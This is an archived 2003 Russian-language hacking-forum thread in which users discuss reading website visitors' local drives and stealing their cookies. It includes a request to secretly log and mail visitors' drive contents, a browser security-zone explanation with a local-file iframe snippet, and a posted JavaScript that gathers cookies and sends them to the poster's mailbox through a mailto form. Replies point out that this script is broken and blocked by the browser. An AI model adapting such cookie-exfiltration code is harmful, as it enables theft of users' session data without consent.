ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
04.10.2003, 20:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Народ, у меня идея есть...Все знают скрипт, когда на твой сайт заходит чел, то он видит свой C: (если он не через анонимомайзер) ...Его можно дописать, что бы его диск, вносился в лог-файл и высылался на определенный мейл...
Я долго ломал башку, но так и не доперло...
Подскажите
|
|
|
|
04.10.2003, 22:45
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Так просто не получится.
Есть такое понятие как зона безопасности.
Твой диск находится в зоне "Мой компьютер", а страница открывается из зоны "Интернет", а доступ из документов одной зоны, к документам другой зоны запрещен.
Так например такой код:
<iframe id="localdisk" src="c:\temp.html"></iframe>
< script>
alert(localdisk.document.innerHTML)
</script>
работать не будет, если он размещен на инетовской страничке(зона "Интернет"  . Будет выдаваться ошибка "Доступ запрещен".
А если это фрагмент файла, открываемого со своей машины (зона "Мой компьютер" , то работать будет )) |
|
|
05.10.2003, 14:33
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
Речь идет даже не о хаке, а о простом просмотре диска c...
|
|
|
|
06.10.2003, 12:21
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
А что, "просто просмотр диска С" это не хак ??  |
|
|
|
11.10.2003, 01:19
|
|
Новичок
Регистрация: 16.08.2003
Сообщений: 20
Провел на форуме:
0
Репутация:
0
|
|
скрипт < script>javascript :navigate('file:///c:/'  </script> ,помещённый где то,срабатывает на машине юзера и каждый видит свой диск С:,а просмотреть чужой конечно можно,но не скриптом на веб странице,скрипт может выяснять только наличие определённых файлов,причём находящихся, как говорится по умалчиванию и не больше,а вот кто знает,как эта мулька работает? http://www.danasoft.com/vipersig.jpg
да,это снифер,но через чур уж прикольный, ещё и умничает в нижней строке (в опере правда ошибается,хотя может в настройках оперы стоит инициировать её как MSIE...) |
|
|
|
12.10.2003, 17:35
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
есть такая феня:
< script language=javascript>
var cook=show_all_cookies();
document.open("cookies",cook);
document.write('<form onsubmit="javascript :window.close();"
method=post action="mailto:ваше мыло@mail.ru"
ENCTYPE="text/plain"><input type=hidden
name=h1 value=',cook,'><input type=submit value="Доброго времени суток!">
</form>' ;
document.close("cookies" ;
</SCRIPT>
(скрипт в целях безопасности был немного изменён)
НО она Изменена!!! 
Я не могу найти оригинал...хотя даже в книге написано именно так...вроде тут все верно, хотя реально он не пашет...((( |
|
|
|
12.10.2003, 21:58
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
И что это ?
Насколько я понял это должно отсылать куки на мыло?
Кстати в скрипте вызывается функция show_all_cookies(), но ее описания нет.
И кстати чтение куков других сайтов не допускается системой безопасности браузера (по кр мере в IE; в опере система немного попроще..)
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
